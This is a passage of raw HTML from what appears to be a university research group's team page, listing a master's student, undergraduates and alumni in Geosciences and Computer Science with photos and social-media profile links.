class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c161\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c161 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c162-outer\">\n            <div data-colibri-id=\"182-c162\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c162 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-844 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c163\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c151-outer\">\n            <div data-colibri-id=\"182-c151\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c151 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c152\" class=\"d-block style-831 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-831-image style-local-182-c152-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c152-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-global-transition-all h-heading style-832 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c153\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"h-text h-text-component style-833 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"style-835 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"d-block style-831 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c157-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c157-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-832 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c158\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c159\" class=\"h-text h-text-component style-833 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"style-835 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c164\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c164 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c220\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c220 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c221-outer\">\n            <div data-colibri-id=\"182-c221\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c221 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-926 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c222\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c165\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c165 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n            <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c167\" class=\"d-block style-913 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c167-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c167-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c168\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"style-917 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n            <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c172\" class=\"d-block style-918 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c172-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c172-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c173\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"style-919 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-920 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-921 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-922 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 